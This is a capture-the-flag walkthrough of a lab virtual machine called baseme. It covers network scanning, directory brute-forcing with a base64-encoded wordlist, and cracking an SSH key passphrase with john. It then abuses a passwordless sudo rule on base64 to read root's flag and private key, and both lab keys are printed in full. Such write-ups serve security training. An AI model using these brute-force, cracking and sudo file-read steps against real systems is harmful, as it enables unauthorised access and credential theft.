Information gathering

arp-scan -l
```
┌──(root㉿kali)-[~/Desktop/tmp]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:7d:7d:cf, IPv4: 192.168.31.129
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.31.1    a4:a9:30:df:ef:44   (Unknown)
192.168.31.85   7e:2c:58:df:4e:cb   (Unknown: locally administered)
192.168.31.220  46:3e:62:f9:1e:fa   (Unknown: locally administered)
192.168.31.232  08:00:27:d9:d3:0c   PCS Systemtechnik GmbH

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.973 seconds (129.75 hosts/sec). 4 responded
```
The target is 192.168.31.232: the 08:00:27 OUI (PCS Systemtechnik GmbH) is a VirtualBox NIC, which is where the box runs. Next, a full TCP port scan with nmap:
```
┌──(root㉿kali)-[~/Desktop/tmp]
└─# nmap 192.168.31.232 --min-rate=1000 -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-22 08:13 EST
Nmap scan report for baseme (192.168.31.232)
Host is up (0.0065s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:D9:D3:0C (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 21.46 seconds
```
Port 80

```
┌──(root㉿kali)-[~/Desktop/tmp]
└─# curl 192.168.31.232
QUxMLCBhYnNvbHV0ZWx5IEFMTCB0aGF0IHlvdSBuZWVkIGlzIGluIEJBU0U2NC4KSW5jbHVkaW5nIHRoZSBwYXNzd29yZCB0aGF0IHlvdSBuZWVkIDopClJlbWVtYmVyLCBCQVNFNjQgaGFzIHRoZSBhbnN3ZXIgdG8gYWxsIHlvdXIgcXVlc3Rpb25zLgotbHVjYXMK
<!--
iloveyou
youloveyou
shelovesyou
helovesyou
weloveyou
theyhatesme
-->
```
The page body is a base64 string, and an HTML comment holds a handful of words.

The base64 decodes to:
```
┌──(root㉿kali)-[~/Desktop/tmp]
└─# echo "QUxMLCBhYnNvbHV0ZWx5IEFMTCB0aGF0IHlvdSBuZWVkIGlzIGluIEJBU0U2NC4KSW5jbHVkaW5nIHRoZSBwYXNzd29yZCB0aGF0IHlvdSBuZWVkIDopClJlbWVtYmVyLCBCQVNFNjQgaGFzIHRoZSBhbnN3ZXIgdG8gYWxsIHlvdXIgcXVlc3Rpb25zLgotbHVjYXMK"|base64 -d
ALL, absolutely ALL that you need is in BASE64.
Including the password that you need :)
Remember, BASE64 has the answer to all your questions.
-lucas
```
That gives a username, lucas, and the hint that everything on this box is base64-encoded, including the names of the files the web server exposes.

Base64-encode the wordlist, then brute-force directories
The original one-liner was missing the `do`/`done` of its inner `for` loop and would not run as written; the corrected loop below does the same job. Note that `echo` appends a newline, so each entry encodes `word\n` (id_rsa becomes `aWRfcnNhCg==`, not `aWRfcnNh`). That happens to be the form this box serves; on another target you would want the bare encoding as well.

```
┌──(root㉿kali)-[~/Desktop/tmp]
└─# while read -r line; do echo "$line" | base64; done < /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt > 1

┌──(root㉿kali)-[~/Desktop/tmp]
└─# gobuster dir -u "http://192.168.31.232" -w ./1
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.31.232
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                ./1
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/aWRfcnNhCg==         (Status: 200) [Size: 2537]
/cm9ib3RzLnR4dAo=     (Status: 200) [Size: 25]
Progress: 4736 / 4737 (99.98%)
===============================================================
Finished
===============================================================
```
The two names decode to id_rsa and robots.txt:
```
┌──(root㉿kali)-[~/Desktop/tmp]
└─# echo "aWRfcnNhCg=="|base64 -d
id_rsa

┌──(root㉿kali)-[~/Desktop/tmp]
└─# echo "cm9ib3RzLnR4dAo="|base64 -d
robots.txt
```
The contents of both files are base64 as well. After downloading them, robots.txt decodes to nothing useful, while the other one is an encrypted OpenSSH private key:
```
┌──(root㉿kali)-[~/Desktop/tmp]
└─# base64 cm9ib3RzLnR4dAo= -d
Nothing here :(

┌──(root㉿kali)-[~/Desktop/tmp]
└─# base64 aWRfcnNhCg=\= -d
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAAGAAAABBTxe8YUL
BtzfftAdPgp8YZAAAAEAAAAAEAAAEXAAAAB3NzaC1yc2EAAAADAQABAAABAQCZCXvEPnO1
cbhxqctBEcBDZjqrFfolwVKmpBgY07M3CK7pO10UgBsLyYwAzJEw4e6YgPNSyCDWFaNTKG
07jgcgrggre8ePCMNFBCAGaYHmLrFIsKDCLI4NE54t58IUHeXCZz72xTobL/ptLk26RBnh
7bHG1JjGlxOkO6m+1oFNLtNuD2QPl8sbZtEzX4S9nNZ/dpyRpMfmB73rN3yyIylevVDEyv
f7CZ7oRO46uDgFPy5VzkndCeJF2YtZBXf5gjc2fajMXvq+b8ol8RZZ6jHXAhiblBXwpAm4
vLYfxzI27BZFnoteBnbdzwSL5apBF5gYWJAHKj/J6MhDj1GKAFc1AAAD0N9UDTcUxwMt5X
YFIZK8ieBL0NOuwocdgbUuktC21SdnSy6ocW3imM+3mzWjPdoBK/Ho339uPmBWI5sbMrpK
xkZMnl+rcTbgz4swv8gNuKhUc7wTgtrNX+PNMdIALNpsxYLt/l56GK8R4J8fLIU5+MojRs
+1NrYs8J4rnO1qWNoJRZoDlAaYqBV95cXoAEkwUHVustfgxUtrYKp+YPFIgx8okMjJgnbi
NNW3TzxluNi5oUhalH2DJ2khKDGQUi9ROFcsEXeJXt3lgpZZt1hrQDA1o8jTXeS4+dW7nZ
zjf3p0M77b/NvcZE+oXYQ1g5Xp1QSOSbj+tlmw54L7Eqb1UhZgnQ7ZsKCoaY9SuAcqm3E0
IJh+I+Zv1egSMS/DOHIxO3psQkciLjkpa+GtwQMl1ZAJHQaB6q70JJcBCfVsykdY52LKDI
pxZYpLZmyDx8TTaA8JOmvGpfNZkMU4I0i5/ZT65SRFJ1NlBCNwcwtOl9k4PW5LVxNsGRCJ
MJr8k5Ac0CX03fXESpmsUUVS+/Dj/hntHw89dO8HcqqIUEpeEbfTWLvax0CiSh3KjSceJp
+8gUyDGvCkcyVneUQjmmrRswRhTNxxKRBZsekGwHpo8hDYbUEFZqzzLAQbBIAdrl1tt7mV
tVBrmpM6CwJdzYEl21FaK8jvdyCwPr5HUgtuxrSpLvndcnwPaxJWGi4P471DDZeRYDGcWh
i6bICrLQgeJlHaEUmrQC5Rdv03zwI9U8DXUZ/OHb40PL8MXqBtU/b6CEU9JuzJpBrKZ+k+
tSn7hr8hppT2tUSxDvC+USMmw/WDfakjfHpoNwh7Pt5i0cwwpkXFQxJPvR0bLxvXZn+3xw
N7bw45FhBZCsHCAbV2+hVsP0lyxCQOj7yGkBja87S1e0q6WZjjB4SprenHkO7tg5Q0HsuM
Aif/02HHzWG+CR/IGlFsNtq1vylt2x+Y/091vCkROBDawjHz/8ogy2Fzg8JYTeoLkHwDGQ
O+TowA10RATek6ZEIxh6SmtDG/V5zeWCuEmK4sRT3q1FSvpB1/H+FxsGCoPIg8FzciGCh2
TLuskcXiagns9N1RLOnlHhiZd8RZA0Zg7oZIaBvaZnhZYGycpAJpWKebjrtokLYuMfXRLl
3/SAeUl72EA3m1DInxsPguFuk00roMc77N6erY7tjOZLVYPoSiygDR1A7f3zYz+0iFI4rL
ND8ikgmQvF6hrwwJBrp/0xKEaMTCKLvyyZ3eDSdBDPrkThhFwrPpI6+Ex8RvcWI6bTJAWJ
LdmmRXUS/DtO+69/aidvxGAYob+1M=
-----END OPENSSH PRIVATE KEY-----
```
The words in the HTML comment on port 80 are the wordlist. Following the hint, base64-encode them (again via `echo`, so each candidate carries the trailing newline) and use them to crack the passphrase on id_rsa.
The original loop again lacked `do`/`done` and appended its output to the very file it was reading from; below the six words live in words.txt and the encoded candidates go to a separate file. (The author reused the name `1` for the wordlist and, later, the john hash file, which is why the session looks confusing.)

```
┌──(root㉿kali)-[~/Desktop/tmp]
└─# while read -r line; do echo "$line" | base64; done < words.txt > words.b64

┌──(root㉿kali)-[~/Desktop/tmp]
└─# cat words.txt words.b64
iloveyou
youloveyou
shelovesyou
helovesyou
weloveyou
theyhatesme
aWxvdmV5b3UK
eW91bG92ZXlvdQo=
c2hlbG92ZXN5b3UK
aGVsb3Zlc3lvdQo=
d2Vsb3ZleW91Cg==
dGhleWhhdGVzbWUK
```
Convert the key to a john hash and run the wordlist against it. "No password hashes left to crack" means john had already cracked this hash in an earlier run and found it in its pot file; `--show` (which cannot be combined with `--wordlist`) prints the stored result.

```
┌──(root㉿kali)-[~/Desktop/tmp]
└─# ssh2john id_rsa > id_rsa.hash

┌──(root㉿kali)-[~/Desktop/tmp]
└─# john id_rsa.hash --wordlist=words.b64
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
No password hashes left to crack (see FAQ)

┌──(root㉿kali)-[~/Desktop/tmp]
└─# john id_rsa.hash --wordlist=words.b64 --show
Invalid options combination: "--show"

┌──(root㉿kali)-[~/Desktop/tmp]
└─# john id_rsa.hash --show
id_rsa:aWxvdmV5b3UK

1 password hash cracked, 0 left
```
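Both brute-force steps above (the directory names for gobuster and the passphrase candidates for john) need the same transformation of a plaintext wordlist, so here is one helper that covers both. It is an added example, not code from the original writeup, and it goes slightly beyond the box: for every word it emits the newline-terminated encoding that `echo word | base64` produces (`aWRfcnNhCg==`, the form this target used) and the bare encoding (`aWRfcnNh`), because another target may have encoded its names without the newline. The file names `words.b64` and the two-word sample list are assumptions for illustration.

```sh
#!/bin/sh
# Added example (not the writeup's own code). Builds a base64 wordlist for
# directory brute-forcing or passphrase cracking from a plaintext list.
# For each word two candidates are written: base64("word\n"), which is what
# `echo word | base64` gives and what this box served, and base64("word").
# Output is unwrapped (base64 wraps at 76 columns by default) and deduplicated.
b64_wordlist() {
    # $1: plaintext wordlist, one entry per line
    while IFS= read -r word || [ -n "$word" ]; do
        [ -z "$word" ] && continue
        printf '%s\n' "$word" | base64 | tr -d '\n'; echo   # encodes "word\n"
        printf '%s'   "$word" | base64 | tr -d '\n'; echo   # encodes "word"
    done < "$1" | sort -u
}

# Map a hit such as /aWRfcnNhCg== back to a filename. The leading slash and
# the newline the encoding may carry are stripped so the result is usable as-is.
decode_name() {
    printf '%s' "${1#/}" | base64 -d | tr -d '\n'
}

# Usage (constructed sample list in a temp file, not the page's common.txt):
#   words=$(mktemp); printf 'id_rsa\nrobots.txt\n' > "$words"
#   b64_wordlist "$words" > words.b64
#   gobuster dir -u http://192.168.31.232 -w words.b64
#   decode_name /aWRfcnNhCg==        # prints id_rsa
```

The same `words.b64` can be handed to `john --wordlist=` for the passphrase step; because both encodings are present, the cracked value tells you whether the box encoded its secret with or without the newline.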
So the passphrase protecting lucas's key is aWxvdmV5b3UK, i.e. base64 of "iloveyou" plus the newline that `echo` appended.
Privilege escalation

Log in over SSH as lucas with the decrypted key (the key file needs mode 600 or ssh will refuse it) and collect user.txt.

`sudo -l` shows that lucas may run base64 as root without a password. base64 reads whatever file it is given, so this is an arbitrary file read as root; /root/root.txt can be read directly. The "unable to resolve host" warning is harmless: the machine's hostname simply is not in /etc/hosts.
```
lucas@MiWiFi-RA71-srv:~$ sudo -u root base64 /root/root.txt|base64 -d
sudo: unable to resolve host MiWiFi-RA71-srv: No address associated with hostname
           .
        ** * *.
      ,* *, , ,*
     ., *,  / * ,*
    *, /. .*. * **
    ,* ,* ** *. **
    **. ,* ** *, ,*
     * ** *, .* *.
      ** ** ,*, **
          *,
HMVFKBS64
```
For an actual root shell, use the same primitive to read root's SSH private key; this one is not passphrase-protected (its header says `none` for the cipher and KDF):
```
lucas@MiWiFi-RA71-srv:~$ sudo -u root base64 /root/.ssh/id_rsa|base64 -d
sudo: unable to resolve host MiWiFi-RA71-srv: No address associated with hostname
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAQEAw6MgMnxUy+W9oem0Uhr2cJiez37qVubRK9D4kdu7H5NQ/Z0FFp2B
IdV3wx9xDWAICJgtYQUvOV7KFNAWvEXTDdhBwdiUcWEJ4AOXK7+5v7x4b8vuG5zK0lTVxp
DEBE8faPj3UaHsa1JUVaDngTIkCa6VBICvG0DCcfL8xHBpCSIfoHfpqmOpWT/pWXvGI3tk
/Ku/STY7Ay8HtSgoqCcf3F+lb9J9kwKhFg9eLO5QDuFujb1CN7gUy8xhgNanUViyCZRwn7
px+DfU+nscSEfG1zgfgqn2hCbBYqaP0jBgWcVL6YoMiwCS3jhmeFG4C/p51j3gI6b8yz9a
S+DtdTpDwQAAA8D82/wZ/Nv8GQAAAAdzc2gtcnNhAAABAQDDoyAyfFTL5b2h6bRSGvZwmJ
7PfupW5tEr0PiR27sfk1D9nQUWnYEh1XfDH3ENYAgImC1hBS85XsoU0Ba8RdMN2EHB2JRx
YQngA5crv7m/vHhvy+4bnMrSVNXGkMQETx9o+PdRoexrUlRVoOeBMiQJrpUEgK8bQMJx8v
zEcGkJIh+gd+mqY6lZP+lZe8Yje2T8q79JNjsDLwe1KCioJx/cX6Vv0n2TAqEWD14s7lAO
4W6NvUI3uBTLzGGA1qdRWLIJlHCfunH4N9T6exxIR8bXOB+CqfaEJsFipo/SMGBZxUvpig
yLAJLeOGZ4UbgL+nnWPeAjpvzLP1pL4O11OkPBAAAAAwEAAQAAAQBIArRoQOGJh9AMWBS6
oBgUC+lw4Ptq710Q7sOAFMxE7BnEsFZeI62TgZqqpNkdHjr2xuT1ME5YpK5niMzFkkIEd5
SEwK6rKRfUcB3lyZWaoMoIBJ1pZoY1c2qYw1KTb3hVUEbgsmRugIhwWGC+anFfavaJCMDr
nCO2g8VMnT/cTyAv/Qmi8m868KNEzcuzGV5ozHl1XLffHM9R/cqPPyAYaQIa9Z+kS6ou9R
iMTjTSxOPnfh286kgx0ry1se9BBlrEc5251R/PRkEKYrMj3AIwI30qvYlAtNfcCFhoJXLq
vWystPARwiUs7WYBUHRf6bPP/pHTTvwwb2bs51ngImpdAAAAgDaWnQ7Lj7Vp+mTjhSu4oG
ptDHNd2uuqB1+CHRcaVutUmknxvxG3p957UbvNp6e0+ePKtAIakrzbpAo6u25poyWugAuz
X2nQhqsQh6yrThDJlTiDMeV7JNGFbGOcanXXXHt3tjfyrS0+aM87WmwqNyh6nfgy1C5axR
fKZG8ivz5iAAAAgQD83QmCIcbZaCOlGwgHGcuCUDcxGY1QlIRnbM5VAjimNezGFs9f0ExD
SiTwFsmITP//njsbRZP2laiKKO6j4yp5LpfgDB5QHs+g4nXvDn6ns64gCKo7tf2bPP8VCe
FWyc2JyqREwE3WmyhkPlyr9xAZerZ+7Fz+NFueRYzDklWg8wAAAIEAxhBeLqbo6/GUKXF5
rFRatLXI43Jrd9pyvLx62KghsnEBEk7my9sbU5dvYBLztS+lfPCRxV2ZzpjYdN4SDJbXIR
txBaLJe3c4uIc9WjyxGwUK9IL65rSrRVERHsTO525ofPWGQEa2A+pRCpz3A4Y41fy8Y9an
2B2NmfTAfEkWFXsAAAALcm9vdEBiYXNlbWU=
-----END OPENSSH PRIVATE KEY-----
```
Save that key on the attacking machine (here it was written over the local id_rsa; chmod 600 it) and log in as root:

```
┌──(root㉿kali)-[~/Desktop/tmp]
└─# ssh root@192.168.31.232 -i id_rsa
Linux MiWiFi-RA71-srv 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Jan 22 08:08:11 2025 from 192.168.31.129
root@MiWiFi-RA71-srv:~#
```
Summary

The wordlist handling could be done more efficiently (encoding each word once, in both newline and bare forms, instead of rebuilding ad hoc), but otherwise the box holds nothing unusual: base64 file names, a base64 passphrase, and a sudo rule on base64 that turns into an arbitrary file read as root.